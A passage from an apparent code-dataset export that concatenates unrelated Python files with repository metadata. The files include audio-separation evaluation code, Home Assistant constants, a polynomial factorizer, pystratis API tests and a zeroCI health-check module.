'weights_active_pairs': weights_active_pairs,
'num_active_refs': num_active_refs,
'num_active_seps': num_active_seps,
'num_active_pairs': num_active_pairs}
def _report_score_stats(metric_per_source_count, label='', counts=None):
"""Report mean and std dev for specified counts."""
values_all = []
if counts is None:
counts = metric_per_source_count.keys()
for count in counts:
values = metric_per_source_count[count]
values_all.extend(list(values))
return '%s for count(s) %s = %.1f +/- %.1f dB' % (
label, counts, np.mean(values_all), np.std(values_all))
def evaluate(checkpoint_path, metagraph_path, data_list_path, output_path):
"""Evaluate a model on FUSS data."""
model = inference.SeparationModel(checkpoint_path, metagraph_path)
file_list = data_io.read_lines_from_file(data_list_path, skip_fields=1)
with model.graph.as_default():
dataset = data_io.wavs_to_dataset(file_list, batch_size=1,
num_samples=160000,
repeat=False)
# Strip batch and mic dimensions.
dataset['receiver_audio'] = dataset['receiver_audio'][0, 0]
dataset['source_images'] = dataset['source_images'][0, :, 0]
# Separate with a trained model.
i = 1
max_count = 4
dict_per_source_count = lambda: {c: [] for c in range(1, max_count + 1)}
sisnr_per_source_count = dict_per_source_count()
sisnri_per_source_count = dict_per_source_count()
under_seps = []
equal_seps = []
over_seps = []
df = None
while True:
try:
waveforms = model.sess.run(dataset)
except tf.errors.OutOfRangeError:
break
separated_waveforms = model.separate(waveforms['receiver_audio'])
source_waveforms = waveforms['source_images']
if np.allclose(source_waveforms, 0):
      print('WARNING: all-zeros source_waveforms tensor encountered. '
            'Skipping this example...')
continue
metrics_dict = compute_metrics(source_waveforms, separated_waveforms,
waveforms['receiver_audio'])
metrics_dict = {k: v.numpy() for k, v in metrics_dict.items()}
sisnr_sep = metrics_dict['sisnr_separated']
sisnr_mix = metrics_dict['sisnr_mixture']
sisnr_imp = metrics_dict['sisnr_improvement']
weights_active_pairs = metrics_dict['weights_active_pairs']
# Create and initialize the dataframe if it doesn't exist.
if df is None:
# Need to create the dataframe.
columns = []
for metric_name, metric_value in metrics_dict.items():
if metric_value.shape:
# Per-source metric.
for i_src in range(1, max_count + 1):
columns.append(metric_name + '_source%d' % i_src)
else:
# Scalar metric.
columns.append(metric_name)
columns.sort()
df = pd.DataFrame(columns=columns)
if output_path.endswith('.csv'):
csv_path = output_path
else:
csv_path = os.path.join(output_path, 'scores.csv')
# Update dataframe with new metrics.
row_dict = {}
for metric_name, metric_value in metrics_dict.items():
if metric_value.shape:
# Per-source metric.
for i_src in range(1, max_count + 1):
row_dict[metric_name + '_source%d' % i_src] = metric_value[i_src - 1]
else:
# Scalar metric.
row_dict[metric_name] = metric_value
new_row = pd.Series(row_dict)
df = df.append(new_row, ignore_index=True)
# Store metrics per source count and report results so far.
under_seps.append(metrics_dict['under_separation'])
equal_seps.append(metrics_dict['equal_separation'])
over_seps.append(metrics_dict['over_separation'])
sisnr_per_source_count[metrics_dict['num_active_refs']].extend(
sisnr_sep[weights_active_pairs].tolist())
sisnri_per_source_count[metrics_dict['num_active_refs']].extend(
sisnr_imp[weights_active_pairs].tolist())
print('Example %d: SI-SNR sep = %.1f dB, SI-SNR mix = %.1f dB, '
'SI-SNR imp = %.1f dB, ref count = %d, sep count = %d' % (
i, np.mean(sisnr_sep), np.mean(sisnr_mix),
np.mean(sisnr_sep - sisnr_mix), metrics_dict['num_active_refs'],
metrics_dict['num_active_seps']))
if not i % 20:
# Report mean statistics and save csv every so often.
lines = [
'Metrics after %d examples:' % i,
_report_score_stats(sisnr_per_source_count, 'SI-SNR',
counts=[1]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[2]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[3]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[4]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[2, 3, 4]),
'Under separation: %.2f' % np.mean(under_seps),
'Equal separation: %.2f' % np.mean(equal_seps),
'Over separation: %.2f' % np.mean(over_seps),
]
print('')
for line in lines:
print(line)
with open(csv_path.replace('.csv', '_summary.txt'), 'w+') as f:
f.writelines([line + '\n' for line in lines])
print('\nWriting csv to %s.\n' % csv_path)
df.to_csv(csv_path)
i += 1
# Report final mean statistics.
lines = [
'Final statistics:',
_report_score_stats(sisnr_per_source_count, 'SI-SNR',
counts=[1]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[2]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[3]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[4]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[2, 3, 4]),
'Under separation: %.2f' % np.mean(under_seps),
'Equal separation: %.2f' % np.mean(equal_seps),
'Over separation: %.2f' % np.mean(over_seps),
]
print('')
for line in lines:
print(line)
with open(csv_path.replace('.csv', '_summary.txt'), 'w+') as f:
f.writelines([line + '\n' for line in lines])
# Write final csv.
print('\nWriting csv to %s.' % csv_path)
df.to_csv(csv_path)
| 41.618474
| 80
| 0.666795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,872
| 0.27714
|
5560d79a769a8dcd00036d30ac155bdbbb8657ae
| 422
|
py
|
Python
|
homeassistant/components/system_bridge/const.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | 11
|
2018-02-16T15:35:47.000Z
|
2020-01-14T15:20:00.000Z
|
homeassistant/components/system_bridge/const.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | 87
|
2020-07-06T22:22:54.000Z
|
2022-03-31T06:01:46.000Z
|
homeassistant/components/system_bridge/const.py
|
Vaarlion/core
|
f3de8b9f28de01abf72c0f5bb0b457eb1841f201
|
[
"Apache-2.0"
] | 11
|
2020-12-16T13:48:14.000Z
|
2022-02-01T00:28:05.000Z
|
"""Constants for the System Bridge integration."""
import asyncio
from aiohttp.client_exceptions import (
ClientConnectionError,
ClientConnectorError,
ClientResponseError,
)
from systembridge.exceptions import BridgeException
DOMAIN = "system_bridge"
BRIDGE_CONNECTION_ERRORS = (
asyncio.TimeoutError,
BridgeException,
ClientConnectionError,
ClientConnectorError,
ClientResponseError,
)
| 21.1
| 51
| 0.779621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 65
| 0.154028
|
55652d01d18ec68adf27b069baae8bf7ed3db2f4
| 1,705
|
py
|
Python
|
python/domain/compliance/model/measure.py
|
ICTU/document-as-code
|
e65fddb94513e7c2f54f248b4ce69e9e10ce42f5
|
[
"Apache-2.0"
] | 2
|
2021-01-09T17:00:51.000Z
|
2021-02-19T09:35:26.000Z
|
python/domain/compliance/model/measure.py
|
ICTU/document-as-code
|
e65fddb94513e7c2f54f248b4ce69e9e10ce42f5
|
[
"Apache-2.0"
] | null | null | null |
python/domain/compliance/model/measure.py
|
ICTU/document-as-code
|
e65fddb94513e7c2f54f248b4ce69e9e10ce42f5
|
[
"Apache-2.0"
] | 1
|
2020-02-24T15:50:05.000Z
|
2020-02-24T15:50:05.000Z
|
"""
BIO measure - defines and describes a measure for BIO compliance
"""
from domain.base import Base
class Measure(Base):
""" Measures that help to in BIO compliance. """
_explain = None
_not_applicable = None
def __init__(self, identifier, description, identifiers, url=None, done=False):
super().__init__(identifier)
self.description = description
self.identifiers = identifiers
self.url = url
self.done = done
def set_explain(self):
self.register_explain(self)
return self
def set_not_applicable(self):
self.register_not_applicable(self)
return self
# ---
@classmethod
def all_applicable_to_fragment(cls, fragment_identifier):
return [
bir_measure
for bir_measure in cls.all
for identifier in bir_measure.identifiers
if fragment_identifier.startswith(identifier)
]
# --- class property explain (rw) ---
@classmethod
def register_explain(cls, explain):
if not isinstance(explain, cls):
raise TypeError(f"explain should be {cls.__name__}, not {explain.__class__.__name__}")
cls._explain = explain
@classmethod
def explain(cls):
return cls._explain
# --- class property not_applicable (rw) ---
@classmethod
def register_not_applicable(cls, not_applicable):
if not isinstance(not_applicable, cls):
raise TypeError(f"not_applicable should be {cls.__name__}, not {not_applicable.__class__.__name__}")
cls._not_applicable = not_applicable
@classmethod
def not_applicable(cls):
return cls._not_applicable
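# Sketch of the intended use (as a comment, since the registration behaviour
# lives in the unseen domain.base.Base class, which is assumed to collect
# instances in the class-level `all` used by all_applicable_to_fragment above;
# the identifier and description values are made up for illustration):
#
#   m = Measure("M-01", "Example measure", ["12.2"])
#   Measure.all_applicable_to_fragment("12.2.1")  # -> [m], since "12.2.1" starts with "12.2"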
| 26.640625
| 112
| 0.652199
| 1,596
| 0.93607
| 0
| 0
| 909
| 0.533138
| 0
| 0
| 362
| 0.212317
|
556657f3480d4123e6f0535b01c6ed2f5345122d
| 615
|
py
|
Python
|
week_06/readibility.py
|
fentybit/cs50
|
a6089e8ba47d0a8990cac3e0b5b28c5f2ba9f9c3
|
[
"CNRI-Python"
] | null | null | null |
week_06/readibility.py
|
fentybit/cs50
|
a6089e8ba47d0a8990cac3e0b5b28c5f2ba9f9c3
|
[
"CNRI-Python"
] | null | null | null |
week_06/readibility.py
|
fentybit/cs50
|
a6089e8ba47d0a8990cac3e0b5b28c5f2ba9f9c3
|
[
"CNRI-Python"
] | null | null | null |
from cs50 import get_string
text = get_string("Text: ")
text_length = len(text)
letters = 0
sentences = 0
words = 1
for i in range(text_length):
if text[i].isalpha():
letters += 1
for i in range(text_length):
if ord(text[i]) == 46 or ord(text[i]) == 33 or ord(text[i]) == 63:
sentences += 1
for i in range(text_length):
if ord(text[i]) == 32:
words += 1
L = 100 * (letters / words)
S = 100 * (sentences / words)
grade = round(0.0588 * L - 0.296 * S - 15.8)
if 16 <= grade:
print("Grade 16+")
elif grade < 1:
print("Before Grade 1")
else:
print(f"Grade {grade}")
| 20.5
| 70
| 0.588618
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 51
| 0.082927
|
5567063c93ec8ddf93486996ed882ce5ca8b8b9d
| 206
|
py
|
Python
|
fauxblog/admin.py
|
nickobrad/faux
|
cecb03e97a176149606dc88373d1844fc1f6b23c
|
[
"MIT"
] | null | null | null |
fauxblog/admin.py
|
nickobrad/faux
|
cecb03e97a176149606dc88373d1844fc1f6b23c
|
[
"MIT"
] | null | null | null |
fauxblog/admin.py
|
nickobrad/faux
|
cecb03e97a176149606dc88373d1844fc1f6b23c
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Category, ImagePost, Location
# Register your models here.
admin.site.register(ImagePost)
admin.site.register(Category)
admin.site.register(Location)
| 20.6
| 49
| 0.81068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.135922
|
556731a35682ef9f34de75b049e18d73969d3bfa
| 1,574
|
py
|
Python
|
lib/Vector.py
|
aldahick/dotter.py
|
c3e783801f36403476087b5638a93e5fd5959bbe
|
[
"MIT"
] | null | null | null |
lib/Vector.py
|
aldahick/dotter.py
|
c3e783801f36403476087b5638a93e5fd5959bbe
|
[
"MIT"
] | null | null | null |
lib/Vector.py
|
aldahick/dotter.py
|
c3e783801f36403476087b5638a93e5fd5959bbe
|
[
"MIT"
] | null | null | null |
import math
from random import randint
# pylint: disable=I0011,invalid-name
class Vector(object):
def __init__(self, x, y=None):
self.x = x
if y is None:
self.y = x
else:
self.y = y
def get_distance(self, other):
distance = self.get_distance_components(other)
return math.sqrt(pow(distance.x, 2) + pow(distance.y, 2))
def get_distance_components(self, other):
return Vector(abs(self.x - other.x), abs(self.y - other.y))
def add(self, other):
return self._calc(other, lambda a, b: a + b)
def sub(self, other):
return self._calc(other, lambda a, b: a - b)
def mul(self, other):
return self._calc(other, lambda a, b: a * b)
def div(self, other):
return self._calc(other, lambda a, b: a / b)
def _calc(self, other, func):
if isinstance(other, Vector):
return Vector(func(self.x, other.x), func(self.y, other.y))
else:
return Vector(func(self.x, other), func(self.y, other))
def __str__(self):
return "({}, {})".format(self.x, self.y)
def slow(self, diff):
self.x = Vector._slow(diff, self.x)
self.y = Vector._slow(diff, self.y)
@staticmethod
def _slow(diff, num):
if num == 0:
return 0
if num > 0:
return num - diff
else:
return num + diff
@staticmethod
def rand(min_v, max_v):
x = randint(min_v.x, max_v.x)
y = randint(min_v.y, max_v.y)
return Vector(x, y)
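# Tiny demonstration of the class above; it runs only when the module is
# executed directly, so importing lib.Vector stays side-effect free.
if __name__ == "__main__":
    a = Vector(3, 4)
    origin = Vector(0)             # y defaults to x, i.e. (0, 0)
    print(a.get_distance(origin))  # 5.0 (the 3-4-5 triangle)
    print(a.add(Vector(1, 1)))     # (4, 5)
    print(a.mul(2))                # (6, 8) - scalar operands are broadcast to both components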
| 26.677966
| 71
| 0.559085
| 1,496
| 0.950445
| 0
| 0
| 320
| 0.203304
| 0
| 0
| 46
| 0.029225
|
55686a8be609e908e7580542f40aa36255c8c155
| 12,532
|
py
|
Python
|
functions.py
|
flyingmat/pyfactorizer
|
6e607408bc21d04b09ecabfc6a579ad4058965f5
|
[
"MIT"
] | null | null | null |
functions.py
|
flyingmat/pyfactorizer
|
6e607408bc21d04b09ecabfc6a579ad4058965f5
|
[
"MIT"
] | null | null | null |
functions.py
|
flyingmat/pyfactorizer
|
6e607408bc21d04b09ecabfc6a579ad4058965f5
|
[
"MIT"
] | null | null | null |
from math import floor
remove_spaces = lambda inlst: [i for i in inlst if i != ' ']
def sf2i(inp):
if float(inp).is_integer():
return str(int(inp))
else:
return str(inp)
def fix_signs(inlst):
i = 0
while i < len(inlst):
if inlst[i] in '+-': # first sign is detected
sign = -1 if inlst[i] == '-' else 1 # sign variable assigned
while i+1 < len(inlst) and inlst[i+1] in '+-': # while more signs are present
if inlst[i+1] == '-': # invert the sign if a minus is detected
sign *= -1
del inlst[i+1] # delete each excessive sign
inlst[i] = '-' if sign == -1 else '+' # change the only sign left's value accordingly
i += 1 # keep checking for other signs
return inlst
def fix_dict(indict):
if type(indict) == dict:
return frozenset(indict.items())
else:
return indict
def get_coefficient(inlst, i):
coeff = ''
k = i - 1
while k >= 0 and inlst[k] in '1234567890.': # keep going backwards to get the full coefficient
coeff = inlst[k] + coeff
k -= 1
coeff = '1' if not coeff else coeff # if no coefficient is specified, 1 is assigned
if k >= 0 and inlst[k] == '-': # check for a minus sign
coeff = '-' + coeff
k = 0 if k < 0 else k # value correction for convert()
coeff = float(coeff)
return (coeff, k)
def get_exponent(inlst, i):
exp = ''
if i+1 < len(inlst) and inlst[i+1] == '^':
k = i + 2
while k < len(inlst) and inlst[k] in '1234567890': # keep going forward to get the full exponent
exp += inlst[k]
k += 1
else:
k = i + 1 # value correction for convert()
exp = 1 if not exp else exp # if no exponent is specified, 1 is assigned
exp = int(exp) # exponents are assumed to be positive integers
return (exp, k)
def convert(inlst):
exps = {}
i = 0
while i < len(inlst):
if inlst[i] == 'x': # if an x-term is detected
(coeff, x_start) = get_coefficient(inlst, i) # get its coefficient
(exp, x_end) = get_exponent(inlst, i) # get its exponent
if exp not in exps:
exps[exp] = coeff
else:
exps[exp] += coeff
del inlst[x_start:x_end]
i = x_start
i += 1
return exps
def solve_x0_terms(inlst):
out = 0
current_term = ''
while inlst:
item = inlst.pop(0)
if item in '#+-':
out += float(current_term) if current_term else 0
current_term = '-' if item == '-' else ''
elif item in '1234567890.':
current_term += item
out += float(current_term) if current_term else 0
return out
def divide_func(exps, div): # uses polynomial long division
newexps = {}
for current_exp in range(max(exps)-max(div), -1, -1):
        if max(exps) - max(div) != current_exp: # bugfix: this for loop could be changed to something more efficient (needs testing with high exponents)
continue
newexps[current_exp] = exps[max(exps)] / div[max(div)]
for exp, coeff in div.items():
m_coeff = exp + current_exp
if m_coeff not in exps:
exps[m_coeff] = 0
exps[m_coeff] -= (newexps[current_exp] * coeff)
if exps[m_coeff] == 0:
del exps[m_coeff] # deletion required because of max() in the main loop that could return a coeff with value 0
if 0 not in newexps:
newexps[0] = 0
return newexps if not exps or not exps[0] else {} # if there is a reminder, return an empty dict; could be changed to return reminder
def n_factors(n):
if type(n) == float and not n.is_integer():
        return  # a bare return ends the generator; raising StopIteration is a RuntimeError under PEP 479
else:
n = int(n)
yield (n, 1)
if n % 2 == 0:
for i in range(floor(abs(n/2)), 0, -1):
if n % i == 0:
yield (i, int(n/i))
else:
tn = floor(abs(n/2))
for i in range( (tn - 1 if tn % 2 == 0 else tn), 0, -2 ):
if n % i == 0:
yield (i, int(n/i))
def x2terms(exps):
a = exps[2] if 2 in exps else 0
b = exps[1] if 1 in exps else 0
c = exps[0] if 0 in exps else 0
return a,b,c
def delta_calc(a,b,c):
return b**2 - 4*a*c
def pow_diff(poly):
out = ()
if max(poly) % 2 == 0:
root_exp = (1.0 / 2)
else:
root_exp = (1.0 / max(poly))
root1 = (abs(poly[max(poly)]) ** root_exp) * (-1 if poly[max(poly)] < 0 else 1)
root2 = (abs(poly[0]) ** root_exp) * (-1 if poly[0] < 0 else 1)
if root1.is_integer() and root2.is_integer():
root1, root2 = int(root1), int(root2)
if max(poly) % 2 == 0:
if poly[0]*poly[max(poly)] < 0:
xm, x0 = root1, root2
out = (( { int(max(poly)/2):xm, 0:x0 }, 1 ), ( { int(max(poly)/2):(xm if xm > 0 else -xm), 0:(x0 if xm < 0 else -x0) }, 1 ))
else:
out = [( { 1:root1, 0:root2}, 1 )]
return out
def binomial_mult_3(poly, expsort):
out = ()
for x0t1, x0t2 in n_factors(poly[0]):
for xmt1, xmt2 in n_factors(poly[expsort[0]]):
if (xmt1*x0t2)+(xmt2*x0t1) == poly[expsort[1]]:
p_div1 = { expsort[1]:xmt1, 0:x0t1 }
p_div2 = { expsort[1]:xmt2, 0:x0t2 }
out = (( p_div1, 1 ), ( p_div2, 1 ))
return out
def binomial_pow3(poly, expsort):
out = ()
if expsort[0] % 3 == 0:
root1 = (abs(poly[expsort[0]]) ** (1.0/3)) * (-1 if poly[expsort[0]] < 0 else 1)
root2 = (abs(poly[0]) ** (1.0/3)) * (-1 if poly[0] < 0 else 1)
if root1.is_integer() and root2.is_integer():
if poly[expsort[1]] == 3*(root1**2)*root2 and poly[expsort[2]] == 3*(root2**2)*root1:
out = [({ expsort[2]:root1, 0:root2 }, 3)]
return out
def binomial_mult_4(poly, expsort):
out = ()
if poly[expsort[0]] / poly[expsort[2]] == poly[expsort[1]] / poly[expsort[3]]:
cfs = [poly[e] for e in expsort]
for (n3, _) in n_factors( max(abs(cfs[0]), abs(cfs[1])) - min(abs(cfs[0]), abs(cfs[1])) ):
if 0 == cfs[0] % n3 == cfs[1] % n3:
n1 = int(cfs[0]/n3)
n2 = int(cfs[1]/n3)
if cfs[3] % n2 == 0:
n4 = int(cfs[3]/n2)
out = [({ min(expsort[1],expsort[2]):n1, 0:n2 }, 1), ({ max(expsort[1],expsort[2]):n3, 0:n4 }, 1)]
break
return out
def bf_int_coordinates(exps):
out_cord = set()
for i in range(2,101):
k = 1/i
if check_fact(exps,k):
yield k
if check_fact(exps,-k):
yield -k
for i in range(1,1001):
if check_fact(exps,i):
yield i
if check_fact(exps,-i):
yield -i
def check_fact(exps,fact):
out = 0
for exp in exps:
out += exps[exp] * (fact**exp)
return round(out,15) == 0
def factorize(poly_stack, func):
poly = poly_stack.pop()
tmexp = max(poly)
div_polys = []
common_factor = 1
checknegative = set([c < 0 for c in poly.values()])
# factorizing checks
for (i, _) in n_factors(min([abs(v) for v in poly.values() if v != 0])): # if common factor in poly, divide e.g. 2x^2+4 -> 2(x^2+2)
checkmult = set() # check performed on every iteration because of coeffs changing with division
for coeff in poly.values():
checkmult.add(coeff % i)
if len(checkmult) == 1 and 0 in checkmult:
common_factor = i if checknegative != set([True]) else -i
break
if common_factor != 1:
div_polys = [ ({ 0:common_factor }, 1) ]
elif len(poly) > 2 and tmexp and poly[0] == 0: # x^5 + x^3 -> x^3(x^2 + 1)
div_polys = [ ({ 1:1, 0:0 }, min([e if e > 0 else tmexp for e in poly])) ]
elif len(poly) == 2 and max(poly) > 1 and poly[0]: # x^2 - 1 -> (x + 1)(x - 1), x^3 - 1, x^3 + 1, etc.
div_polys = pow_diff(poly)
elif len(poly) == 3 and poly[0]: # x^2 + 2x + 1 -> (x + 1)^2, 3x^2 + 7x + 2 -> (3x + 1)(x + 2), etc. max exp can be > 2
expsort = sorted(poly)[::-1]
if expsort[0] % 2 == 0 and expsort[0]-expsort[1] == expsort[1]-expsort[2]:
div_polys = binomial_mult_3(poly, expsort)
elif len(poly) == 4 and poly[0]:
expsort = sorted(poly)[::-1]
if expsort[0]-expsort[1] == expsort[1]-expsort[2] == expsort[2]-expsort[3]:
div_polys = binomial_pow3(poly, expsort)
        if not div_polys: # 6x^6 + 4x^4 + 15x^2 + 10 would trigger the first check but not the second when using ELIF (one doesn't exclude the other)
if expsort[0]-expsort[2] == expsort[1]-expsort[3]:
div_polys = binomial_mult_4(poly,expsort)
if not div_polys and tmexp > 2:
# bruteforce
div_count = tmexp
for xv in bf_int_coordinates(poly):
div_polys.append(({ 1:1, 0:-xv }, 1))
div_count -= 1
if div_count == 0:
break
for p, e in div_polys:
for div_i in range(e):
poly = divide_func(poly, p)
if (max(p) > 2) or (max(p) == 2 and p[0] and delta_calc(*x2terms(p)) >= 0):
poly_stack.append(p)
else:
func.add(p, 1)
if div_polys and ((max(poly) > 2) or (max(poly) == 2 and poly[0] and delta_calc(*x2terms(poly)) >= 0)):
poly_stack.append(poly)
else:
if len(poly) == 2 and not poly[0]: # fix for ax^2 -> x^2 divided by a -> poly = {2:1,0:0}:1, should be {1:1,0:0}:2
func.add({ 1:1, 0:0 }, max(poly))
else:
func.add(poly, 1)
if poly_stack:
factorize(poly_stack, func)
def polyformat(polys, x0t):
out = ['','']
brackets = False
if len(polys) > 1 or x0t != 1:
brackets = True
out[0] += sf2i(x0t) if x0t not in (1,-1) or len(polys) == 0 else '-' if x0t == -1 else ''
for poly, exp in polys.items():
poly = dict(poly)
if len(poly) == 2 and not poly[0]:
out[1] = 'x'
if exp > 1:
out[1] += '^' + str(exp)
else:
current_poly = ''
if exp > 1:
brackets = True
expsort = sorted(poly)[::-1]
for e in expsort:
current_poly += '- ' if poly[e] < 0 else '+ ' if poly[e] > 0 else ''
if e != 0:
current_poly += sf2i(abs(poly[e])) if poly[e] not in (1,-1) else ''
current_poly += 'x'
current_poly += '^' + sf2i(e) + ' ' if e != 1 else ' '
else:
current_poly += sf2i(abs(poly[e])) if poly[e] else ''
if current_poly[0] == '+':
current_poly = current_poly[2:]
elif current_poly[0] == '-' and brackets:
current_poly = '-' + current_poly[2:]
current_poly = '(' + current_poly + ')' if brackets else current_poly
current_poly += '^' + sf2i(exp) if exp != 1 else ''
out.append(current_poly)
return ''.join(out)
class Function():
def __init__(self, data):
self.data = {}
self.x0t = 1
if type(data) == dict:
self.exps = data
else:
self.eqt = remove_spaces(data)
self.eqt = fix_signs(self.eqt)
self.exps = convert(self.eqt) # self.eqt is referenced and edited directly by convert()
if 0 not in self.exps: # 0 may already be in exps because of x^0 terms
self.exps[0] = 0
self.exps[0] += solve_x0_terms(self.eqt) # x-terms have already been removed from self.eqt
self.out = ""
def __repr__(self):
return repr(self.data)
def add(self, indict, exp):
if len(dict(indict)) == 1:
self.x0t *= ((dict(indict))[0] ** exp) # number-only terms (x^0) are managed separately
else:
self.indict = fix_dict(indict)
if self.indict in self.data:
self.data[self.indict] += exp
else:
self.data[self.indict] = exp
def factorize(self):
if set(self.exps.values()) != set([0]):
factorize([self.exps], self)
#print(self.data)
return polyformat(self.data, self.x0t)
else:
return '0'
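# Small end-to-end check of the factorizer above, run only when the module is
# executed directly. The quadratic is chosen so the binomial_mult_3 path applies.
if __name__ == "__main__":
    f = Function("x^2 + 2x + 1")
    print(f.factorize())  # expected: (x + 1)^2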
| 39.040498
| 151
| 0.514682
| 1,265
| 0.100942
| 770
| 0.061443
| 0
| 0
| 0
| 0
| 1,829
| 0.145946
|
556a5954e27e88a1963c24a16323e7c269ae5148
| 2,556
|
py
|
Python
|
pystratis/api/balances/tests/test_balances.py
|
madrazzl3/pystratis
|
8b78552e753ae1d12f2afb39e9a322a270fbb7b3
|
[
"MIT"
] | null | null | null |
pystratis/api/balances/tests/test_balances.py
|
madrazzl3/pystratis
|
8b78552e753ae1d12f2afb39e9a322a270fbb7b3
|
[
"MIT"
] | null | null | null |
pystratis/api/balances/tests/test_balances.py
|
madrazzl3/pystratis
|
8b78552e753ae1d12f2afb39e9a322a270fbb7b3
|
[
"MIT"
] | null | null | null |
import pytest
from pytest_mock import MockerFixture
from pystratis.api.balances import Balances
from pystratis.core.types import Address
from pystratis.core.networks import CirrusMain
def test_all_strax_endpoints_implemented(strax_swagger_json):
paths = [key.lower() for key in strax_swagger_json['paths']]
for endpoint in paths:
if Balances.route + '/' in endpoint:
assert endpoint in Balances.endpoints
def test_all_cirrus_endpoints_implemented(cirrus_swagger_json):
paths = [key.lower() for key in cirrus_swagger_json['paths']]
for endpoint in paths:
if Balances.route + '/' in endpoint:
assert endpoint in Balances.endpoints
def test_all_interfluxstrax_endpoints_implemented(interfluxstrax_swagger_json):
paths = [key.lower() for key in interfluxstrax_swagger_json['paths']]
for endpoint in paths:
if Balances.route + '/' in endpoint:
assert endpoint in Balances.endpoints
def test_all_interfluxcirrus_endpoints_implemented(interfluxcirrus_swagger_json):
paths = [key.lower() for key in interfluxcirrus_swagger_json['paths']]
for endpoint in paths:
if Balances.route + '/' in endpoint:
assert endpoint in Balances.endpoints
@pytest.mark.parametrize('network', [CirrusMain()], ids=['CirrusMain'])
def test_overamountatheight(mocker: MockerFixture, network, overamountatheightresponse):
data = overamountatheightresponse(network)
mocker.patch.object(Balances, 'get', return_value=data)
balances = Balances(network=network, baseuri=mocker.MagicMock(), session=mocker.MagicMock())
response = balances.over_amount_at_height(block_height=10, amount=10)
assert len(response) == len(data)
for i in range(len(response)):
assert isinstance(response[i], Address)
assert response[i] == data[i]
# noinspection PyUnresolvedReferences
balances.get.assert_called_once()
@pytest.mark.parametrize('network', [CirrusMain()], ids=['CirrusMain'])
def test_overamountatheight_none(mocker: MockerFixture, network):
data = []
mocker.patch.object(Balances, 'get', return_value=data)
balances = Balances(network=network, baseuri=mocker.MagicMock(), session=mocker.MagicMock())
response = balances.over_amount_at_height(block_height=10, amount=10)
assert len(response) == len(data)
for i in range(len(response)):
assert isinstance(response[i], Address)
assert response[i] == data[i]
# noinspection PyUnresolvedReferences
balances.get.assert_called_once()
| 38.727273
| 96
| 0.736307
| 0
| 0
| 0
| 0
| 1,302
| 0.50939
| 0
| 0
| 166
| 0.064945
|
556d8216ffbaa6f7a0d0816c6b1ba9baa984c1a1
| 381
|
py
|
Python
|
Problems/14.py
|
Maurya232Abhishek/Python-repository-for-basics
|
3dcec5c529a0847df07c9dcc1424675754ce6376
|
[
"MIT"
] | 2
|
2021-07-14T11:01:58.000Z
|
2021-07-14T11:02:01.000Z
|
Problems/14.py
|
Maurya232Abhishek/Python-repository-for-basics
|
3dcec5c529a0847df07c9dcc1424675754ce6376
|
[
"MIT"
] | null | null | null |
Problems/14.py
|
Maurya232Abhishek/Python-repository-for-basics
|
3dcec5c529a0847df07c9dcc1424675754ce6376
|
[
"MIT"
] | null | null | null |
def isPerCube(n):
    # Round the cube root to the nearest integer and verify it cubes back to n.
    x = int(n ** (1 / 3) + 0.5)
    if x ** 3 == n:
        return True
    return False
""" x = 2
while True:
y = n / (x * x)
if (x == y):
print(x)
if x == int(x):
return True
else:
return False
x = (y + x + x) / 3
print(x)"""
print(isPerCube(27))  # sample input: 27 is a perfect cube, so this prints True
| 19.05
| 28
| 0.351706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 245
| 0.643045
|
556e3ec9c1d73a0070074ad45f8de00d47c96b09
| 179
|
py
|
Python
|
year1/python/week2/q9_squareroots.py
|
OthmanEmpire/university
|
3405e1463e82ca2e6f7deef05c3b1ba0ab9c1278
|
[
"MIT"
] | 1
|
2016-05-21T17:23:50.000Z
|
2016-05-21T17:23:50.000Z
|
year1/python/week2/q9_squareroots.py
|
OthmanEmpire/university_code
|
3405e1463e82ca2e6f7deef05c3b1ba0ab9c1278
|
[
"MIT"
] | null | null | null |
year1/python/week2/q9_squareroots.py
|
OthmanEmpire/university_code
|
3405e1463e82ca2e6f7deef05c3b1ba0ab9c1278
|
[
"MIT"
] | null | null | null |
## This program prints the first 10 perfect squares whose square roots are even ##
for x in range(1, 11):
    y = (2*x)**2  # the square of the even number 2x; its square root 2x is even as well
    print(y)
| 29.833333
| 72
| 0.603352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 114
| 0.636872
|
556f083296f917021fc8c5ac171cde72ce1bed3a
| 1,690
|
py
|
Python
|
backend/health/health_check.py
|
threefoldtech/zeroCI
|
851def4cbaebba681641ecb24c731de56277d6ed
|
[
"Apache-2.0"
] | null | null | null |
backend/health/health_check.py
|
threefoldtech/zeroCI
|
851def4cbaebba681641ecb24c731de56277d6ed
|
[
"Apache-2.0"
] | 52
|
2019-11-14T09:39:04.000Z
|
2021-03-16T10:15:55.000Z
|
backend/health/health_check.py
|
AhmedHanafy725/0-CI
|
ce73044eea2c15bcbb161a1d6f23e75e4f8d53a0
|
[
"Apache-2.0"
] | 1
|
2019-10-30T09:51:25.000Z
|
2019-10-30T09:51:25.000Z
|
import sys
sys.path.append("/sandbox/code/github/threefoldtech/zeroCI/backend")
from redis import Redis
from health_recover import Recover
from utils.utils import Utils
recover = Recover()
class Health(Utils):
def get_process_pid(self, name):
cmd = f"ps -aux | grep -v grep | grep '{name}' | awk '{{print $2}}'"
response = self.execute_cmd(cmd=cmd, timeout=5)
pids = response.stdout.split()
return pids
def test_zeroci_server(self):
"""Check zeroci server is still running
"""
pid = self.get_process_pid("python3 zeroci")
if not pid:
recover.zeroci()
def test_redis(self):
"""Check redis is still running.
"""
pid = self.get_process_pid("redis")
if not pid:
